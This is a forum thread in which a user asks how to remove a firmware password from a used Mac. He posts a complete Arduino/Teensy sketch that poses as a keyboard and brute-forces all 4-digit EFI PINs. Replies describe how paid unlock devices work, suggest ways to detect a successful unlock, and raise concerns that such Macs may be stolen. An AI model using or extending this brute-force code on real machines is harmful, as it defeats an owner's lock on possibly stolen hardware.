Author Topic: Mac EFI password device  (Read 14997 times)


Offline nhoj_yelbom (Topic starter)

  • Contributor
  • Posts: 23
Mac EFI password device
« on: January 04, 2014, 10:20:38 am »
this device is pretty neat, guy is selling them on ebay for $140. i have had to re-flash my efi chip (late 2011 MBP) manually when i found out it had an efi password. the password blocks booting from anything other than default, so os restores etc can't be done on the machine. the device uses credits to charge for each unlock, curious to see if anyone knows the inner workings! i'm sure the fw is protected on the device to prevent copies

http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=251341941666&fromMakeTrack=true&ssPageName=VIP:watchlink:top:en
 

Offline mikeselectricstuff

  • Super Contributor
  • Posts: 13804
  • Country: gb
    • Mike's Electric Stuff
Re: Mac EFI password device
« Reply #1 on: January 04, 2014, 11:27:11 am »
Not familiar with Mac stuff but at a guess it's probably just reprogramming an SPI flash chip
Youtube channel:Taking wierd stuff apart. Very apart.
Mike's Electric Stuff: High voltage, vintage electronics etc.
Day Job: Mostly LEDs
 

Offline nhoj_yelbom (Topic starter)

  • Contributor
  • Posts: 23
Re: Mac EFI password device
« Reply #2 on: January 04, 2014, 11:45:38 am »
anyone able to convert this arduino code to .hex i can use in Atmel FLIP programming? for AT90USB162, i'm not up to the level needed to convert it. thanks

Code:
#include <usb_keyboard.h>
// This code is licensed under Apache 2.0 License
// http://www.apache.org/licenses/LICENSE-2.0.txt
// Limitation of Liability. In no event and under no legal theory,
// whether in tort (including negligence), contract, or otherwise,
// unless required by applicable law (such as deliberate and grossly
// negligent acts) or agreed to in writing, shall any Contributor be
// liable to You for damages, including any direct, indirect, special,
// incidental, or consequential damages of any character arising as a
// result of this License or out of the use or inability to use the
// Work (including but not limited to damages for loss of goodwill,
// work stoppage, computer failure or malfunction, or any and all
// other commercial damages or losses), even if such Contributor
// has been advised of the possibility of such damages.
// This code is intended for people who are not able to contact
// apple support and I am in no way liable for any damage or
// problems this code might cause.
const int ledPin = 13; // choose the pin for the LED
int counter = 0;
int fakecounter = counter;
char pin[] = "xxxx";

void setup() {
  pinMode(ledPin, OUTPUT); // declare LED as output
  delay(10000);
}

void loop() {
  keyboard_modifier_keys = 0;
  if (counter <= 9999) {
    delay(8000);
    digitalWrite(ledPin, LOW);
    delay(5500);
    digitalWrite(ledPin, HIGH);
    sprintf(pin, "%04d", fakecounter);
    // sending first digit
    Keyboard.press(pin[0]);
    delay(450);
    Keyboard.release(pin[0]);
    delay(420);
    // sending second digit
    Keyboard.press(pin[1]);
    delay(398);
    Keyboard.release(pin[1]);
    delay(510);
    // sending third digit
    Keyboard.press(pin[2]);
    delay(421);
    Keyboard.release(pin[2]);
    delay(423);
    // sending fourth digit
    Keyboard.press(pin[3]);
    delay(430);
    Keyboard.release(pin[3]);
    delay(525);
    // sending enter
    Keyboard.press(KEY_ENTER);
    delay(305);
    Keyboard.release(KEY_ENTER);
  }
  // reached 4 digit PIN max value
  if (counter > 9999) {
    for (int blinkies = 0; blinkies < 8; blinkies++) {
      digitalWrite(ledPin, HIGH);
      delay(20);
      digitalWrite(ledPin, LOW);
      delay(200);
    }
    delay(6000);
  }
  ++counter;
  fakecounter = counter;
}

Moderator Message: Please create a new thread for this post as it doesn't seem to be related to the first one in this thread.
"this is for the efi password, i can make a new thread if needed"
« Last Edit: January 04, 2014, 11:52:59 am by nhoj_yelbom »
 

Offline amyk

  • Super Contributor
  • Posts: 8319
Re: Mac EFI password device
« Reply #3 on: January 04, 2014, 12:30:38 pm »
Not familiar with Mac stuff but at a guess it's probably just reprogramming an SPI flash chip
Agreed. A cheap logic analyser (Saleae and clones come to mind) will probably tell you very easily how it does that. The Thinkpads use a similar scheme where the password is stored in an EEPROM and you can reset it much the same way.

...and I'm not entirely sure how a LED blinking code is related to that in any way.
 

Lurch

  • Guest
Re: Mac EFI password device
« Reply #4 on: January 04, 2014, 04:04:12 pm »
this device is pretty neat, guy is selling them on ebay for $140.

You'd think for $140 the seller could give more than 3 minutes to writing up a description. I don't see what this does?

anyone able to convert this arduino code to .hex i can use in Atmel FLIP programming? for AT90USB162, i'm not up to the level needed to convert it. thanks

If you're not up to the level of converting an Arduino sketch to hex then I can see some "how do I unbrick x" posts coming up.
« Last Edit: January 04, 2014, 04:06:44 pm by Lurch »
 

Offline nhoj_yelbom (Topic starter)

  • Contributor
  • Posts: 23
Re: Mac EFI password device
« Reply #5 on: January 04, 2014, 08:43:45 pm »
this device is pretty neat, guy is selling them on ebay for $140.

You'd think for $140 the seller could give more than 3 minutes to writing up a description. I don't see what this does?

anyone able to convert this arduino code to .hex i can use in Atmel FLIP programming? for AT90USB162, i'm not up to the level needed to convert it. thanks

If you're not up to the level of converting an Arduino sketch to hex then I can see some "how do I unbrick x" posts coming up.

i have no programming language knowledge, and i can't find the hex in the temp folder on version 1.05. this code is for brute forcing the efi pin, so no bricking ;)
 

Tac Eht Xilef

  • Guest
Re: Mac EFI password device
« Reply #6 on: January 04, 2014, 09:13:25 pm »
the device uses credits to charge for each unlock, curious to see if anyone knows the inner workings!

You'd be surprised. There's 2 methods, depending on the model - the first emulates the keyboard and simply brute-forces the 4-digit password; the second simply reflashes the EFI firmware with one extracted from an Apple EFI firmware update.

i'm sure the fw is protected on the device to prevent copies

I'm sure it is too - don't want people figuring out how to get around the use counter he's crippled it with. Nice of him to offer a $25 'core charge'-style refund if you return the used unit to him though...

(p.s. Apple will generally do it for free - even out of warranty - if you can prove you're the owner e.g. you bought your Mac direct from them, have a retail receipt with S/N, have ever registered it for Applecare, etc.)

 

Offline nhoj_yelbom (Topic starter)

  • Contributor
  • Posts: 23
Re: Mac EFI password device
« Reply #7 on: January 04, 2014, 09:24:26 pm »
the device uses credits to charge for each unlock, curious to see if anyone knows the inner workings!

You'd be surprised. There's 2 methods, depending on the model - the first emulates the keyboard and simply brute-forces the 4-digit password; the second simply reflashes the EFI firmware with one extracted from an Apple EFI firmware update.

i'm sure the fw is protected on the device to prevent copies

I'm sure it is too - don't want people figuring out how to get around the use counter he's crippled it with. Nice of him to offer a $25 'core charge'-style refund if you return the used unit to him though...

(p.s. Apple will generally do it for free - even out of warranty - if you can prove you're the owner e.g. you bought your Mac direct from them, have a retail receipt with S/N, have ever registered it for Applecare, etc.)

thanks for the reply. this unit he is selling reflashes the efi chip. i have the efi brute force code posted for teensyduino, i need it on my AT90USB162. apple is no help "genius" bar is 200+ miles away, and when you buy used there is no proof of purchase. hopefully everyone that sees this thread will check for efi password before they get in the same situation.
 

Tac Eht Xilef

  • Guest
Re: Mac EFI password device
« Reply #8 on: January 04, 2014, 10:03:53 pm »
i have the efi brute force code posted for teensyduino, i need it on my AT90USB162.

Ah, so that's what the code is for - it seemed to have no connection to your initial post, so I didn't bother reading it.

i have no programming language knowledge, and i can't find the hex in the temp folder on version 1.05.

Try setting the build.path variable in the Arduino IDE's preferences.txt, or turn on verbose messages when compiling. But if you really have no experience, and you're not using one of the Arduino-targeted AT90USB162 boards, then there's a whole lot of other stuff (e.g. clock speed, fuse bits, etc) you'll have to take into account even if someone does offer to compile it for you.
 

Offline nhoj_yelbom (Topic starter)

  • Contributor
  • Posts: 23
Re: Mac EFI password device
« Reply #9 on: January 04, 2014, 10:25:34 pm »
i have the efi brute force code posted for teensyduino, i need it on my AT90USB162.

Ah, so that's what the code is for - it seemed to have no connection to your initial post, so I didn't bother reading it.

i have no programming language knowledge, and i can't find the hex in the temp folder on version 1.05.

Try setting the build.path variable in the Arduino IDE's preferences.txt, or turn on verbose messages when compiling. But if you really have no experience, and you're not using one of the Arduino-targeted AT90USB162 boards, then there's a whole lot of other stuff (e.g. clock speed, fuse bits, etc) you'll have to take into account even if someone does offer to compile it for you.

thank you. i should have my teensy next week, so it may be too much trouble then.
 

Offline lorth

  • Contributor
  • Posts: 46
  • Country: us
Re: Mac EFI password device
« Reply #10 on: January 05, 2014, 11:53:17 am »
You better do all of this, and the next boot with no internet before you wipe everything. If someone with a Mac was "savvy" enough to put an EFI password, they will probably also have FindMyMac or Prey installed... Because, why would a "normal" seller sell you something with a password that he/she doesn't tell you or that you can contact to ask...?
 

Offline amyk

  • Super Contributor
  • ***
  • Posts: 8319
Re: Mac EFI password device
« Reply #11 on: January 05, 2014, 12:39:51 pm »
You better do all of this, and the next boot with no internet before you wipe everything. If someone with a Mac was "savvy" enough to put an EFI password, they will probably also have FindMyMac or Prey installed... Because, why would a "normal" seller sell you something with a password that he/she doesn't tell you or that you can contact to ask...?
Sometimes it's an employee who puts a password on a company's laptop, then leaves/dies/etc. The company can't be bothered going through the whole process so just sells them as-is as non-working parts units. Happens all the time with Thinkpads.
 

Online kripton2035

  • Super Contributor
  • Posts: 2627
  • Country: fr
    • kripton2035 schematics repository
Re: Mac EFI password device
« Reply #12 on: January 05, 2014, 12:53:26 pm »
sometimes (often) it is someone that wants to remove his login password he has lost
and there it's easy to change the firmware password, the tools are at one menu line of each other
then they reset the login password, but don't remove the firmware password they just set
then they forget ...
I often have these schemes from people coming to the shop.
 

Offline nhoj_yelbom (Topic starter)

  • Contributor
  • Posts: 23
Re: Mac EFI password device
« Reply #13 on: January 05, 2014, 11:36:07 pm »
You better do all of this, and the next boot with no internet before you wipe everything. If someone with a Mac was "savvy" enough to put an EFI password, they will probably also have FindMyMac or Prey installed... Because, why would a "normal" seller sell you something with a password that he/she doesn't tell you or that you can contact to ask...?

you don't have to be mac savvy for it to have EFI password, if it's locked with find my mac it adds the same icloud pin to EFI. in my case i had a computer with efi pass only, and until i needed to reload os is when i found out.

btw: does anyone here know how to add to that teensyduino code (above) to allow it to remember the correct pin? otherwise i will have to re-run and keep narrowing it down. thanks

 

Tac Eht Xilef

  • Guest
Re: Mac EFI password device
« Reply #14 on: January 06, 2014, 02:39:36 am »
btw: does anyone here know how to add to that teensyduino code (above) to allow it to remember the correct pin? otherwise i will have to re-run and keep narrowing it down.

Q: How does the arduino know what the correct PIN is?

A: It doesn't; there's no feedback or acknowledgement to the USB/keyboard that the laptop has successfully unlocked.

It looks like it prints each PIN to stdout as it tries it, but that's no good unless you're sitting there and see it unlock. I guess you could rig something up to look for some related sign (change of screen light level / colour from screen? Login sound?), store the value, & stop the loop.

But why not just reset the EFI PIN? Once you're in you don't need the password to do that...
 

Offline nhoj_yelbom (Topic starter)

  • Contributor
  • Posts: 23
Re: Mac EFI password device
« Reply #15 on: January 06, 2014, 02:42:16 am »
btw: does anyone here know how to add to that teensyduino code (above) to allow it to remember the correct pin? otherwise i will have to re-run and keep narrowing it down.

Q: How does the arduino know what the correct PIN is?

A: It doesn't; there's no feedback or acknowledgement to the USB/keyboard that the laptop has successfully unlocked.

It looks like it prints each PIN to stdout as it tries it, but that's no good unless you're sitting there and see it unlock. I guess you could rig something up to look for some related sign (change of screen light level / colour from screen? Login sound?), store the value, & stop the loop.


But why not just reset the EFI PIN? Once you're in you don't need the password to do that...

the pin entry is dots, does not reveal what's typed in. pin needs to be known to change, just verified. there is another ebay auction with a teensy brute force that claims to memorize the correct pin, and create a text file on the device.
« Last Edit: January 06, 2014, 02:48:23 am by nhoj_yelbom »
 

Tac Eht Xilef

  • Guest
Re: Mac EFI password device
« Reply #16 on: January 06, 2014, 03:44:04 am »
the pin entry is dots, does not reveal whats typed in.

Sorry, I wasn't clear - before it sends keystrokes to the Mac, the arduino sends the PIN it's about to try to stdout (which isn't configured in your code, so I guess it's just dropped). You could configure stdout to go somewhere (e.g. serial, change the sprintf statement to print to LCD, etc), wait to see the Mac unlocked, and check the output to see what the last PIN tried was.

If you can think of a way to detect that the Mac has unlocked, you wouldn't have to sit there waiting for it - you could simply let it run and check the result later.

pin needs to be known to change, just verified.

As far as I know, no it doesn't - once you're past the EFI lock you can log in as root or boot into single-user mode & reset the EFI password using standard utilities on the install CD / rescue partition without knowing the old one.

there is another ebay auction with a teensy brute force that claims to memorize the correct pin, and create a text file on the device.

Then it has a way of detecting when it's gotten past the password. I mentioned that earlier - but, as I hinted, I can't think of a way that doesn't involve additional hardware.

At this point I'm a little uncomfortable going further without a decent explanation of why you want to do this. At the very least, you should probably put some of your own time into understanding how the code you've found and posted works rather than just asking other people to compile / modify / explain it for you...
 

Offline nhoj_yelbom (Topic starter)

  • Contributor
  • Posts: 23
Re: Mac EFI password device
« Reply #17 on: January 06, 2014, 03:59:22 am »
i have explained in the previous posts why i have an efi password. i bought the computer used over 1 year ago, now i realized i can't install mavericks from usb.

i have verified on my 2012 macbook pro that has efi pass setup, it does require old password to change it. hold option, enter password, recovery, utilities, efi password. it has enter old password, enter new, verify new

Then it has a way of detecting when it's gotten past the password. I mentioned that earlier - but, as I hinted, I can't think of a way that doesn't involve additional hardware.

i have an at90usb162 that i'm sure could key log?
« Last Edit: January 06, 2014, 04:09:57 am by nhoj_yelbom »
 

Online kripton2035

  • Super Contributor
  • ***
  • Posts: 2627
  • Country: fr
    • kripton2035 schematics repository
Re: Mac EFI password device
« Reply #18 on: January 06, 2014, 07:03:55 am »
if you have lost an efi password on a recent mac, you'd better go to an apple store with some proof of purchase and get the password removed.
it will cost you far less than a toasted logic board if you try to reflash some ridiculously small chip. IMHO.
 

Offline amyk

  • Super Contributor
  • Posts: 8319
Re: Mac EFI password device
« Reply #19 on: January 06, 2014, 08:34:42 am »
What changes when you've entered the correct one? Maybe a phototransistor pointed at the screen might work...
 

Offline peter.mitchell

  • Super Contributor
  • Posts: 1567
  • Country: au
Re: Mac EFI password device
« Reply #20 on: January 06, 2014, 09:44:23 am »
a pin to the speaker driver and a wait on the loop, so if a successful key is entered it detects the startup sound. I know the startup sound can be disabled, but often it is not. May also be able to use a USB device, as when the usb driver is loaded, devices on the bus are reset.
 

Offline nhoj_yelbom (Topic starter)

  • Contributor
  • Posts: 23
Re: Mac EFI password device
« Reply #21 on: January 07, 2014, 03:20:28 am »
i have my teensy 3.0 working, anyone know arduino code? i would like it to log the last XXXX entered or log all entered. thanks!
 

